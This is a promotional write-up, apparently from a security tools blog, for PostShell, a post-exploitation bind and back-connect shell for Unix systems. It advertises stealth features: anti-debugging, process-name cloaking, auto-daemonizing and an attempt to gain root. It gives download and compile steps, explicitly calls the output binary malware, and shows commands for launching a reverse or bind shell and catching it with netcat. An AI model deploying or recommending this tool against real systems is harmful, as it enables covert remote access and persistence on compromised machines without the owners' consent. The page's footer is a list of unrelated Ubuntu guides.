PostShell – Post Exploitation Bind/Backconnect Shell

PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control. The stub size is around 14kb and can be compiled on any Unix like system.

ScreenShots

Banner and interaction with shell after a connection is started.

Also Read – Metame : Metamorphic Code Engine For Arbitrary Executables

Why not use a traditional Backconnect/Bind Shell?

PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl.

It also incorporates both a back connect and bind shell, meaning that if a target doesn’t allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.

PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.

Features

  • Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.
  • Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.
  • TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.
  • Bind/Backconnect shell, both a bind shell and back connect can be created.
  • Small Stub Size, a very small stub(<14kb) is usually generated.
  • Automatically Daemonizes
  • Tries to set GUID/UID to 0 (root)

Getting Started

Downloading: git clone https://github.com/rek7/postshell

Compiling: cd postshell && sh compile.sh This should create a binary called “stub” this is the malware.

Commands

$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

Example Usage

Backconnect:

$ ./stub 127.0.0.1 13377

Bind Shell:

$ ./stub 13377

Recieving a Connection with Netcat

Recieving a backconnect:

$ nc -vlp port

Connecting to a bind Shell:

$ nc host port

R K

Recent Posts

Configure a Static IP Address on Ubuntu 18.04: Netplan Guide

Setting a static IP address on your server is a smart move. It ensures your…

6 hours ago

Install Xrdp on Ubuntu 18.04: Remote Desktop Setup Guide

Xrdp is an open-source implementation of the Microsoft Remote Desktop Protocol (RDP). It lets you access…

7 hours ago

Add and Delete Users on Ubuntu 18.04: A Practical Guide

Managing user accounts is one of the most basic system administration tasks on any Linux…

7 hours ago

Install Wine on Ubuntu 18.04: Run Windows Apps on Linux

Wine (short for "Wine Is Not an Emulator") is a compatibility layer that lets you run…

7 hours ago

Install KVM on Ubuntu 18.04: Setup, Network, and Create VMs

KVM (Kernel-based Virtual Machine) is an open-source virtualization technology built into the Linux kernel. It lets…

7 hours ago

Upgrade to Ubuntu 20.04 LTS: Prepare, Update, and Confirm

Ubuntu 20.04 LTS (code name Focal Fossa) was released on April 23, 2020. It is a…

1 day ago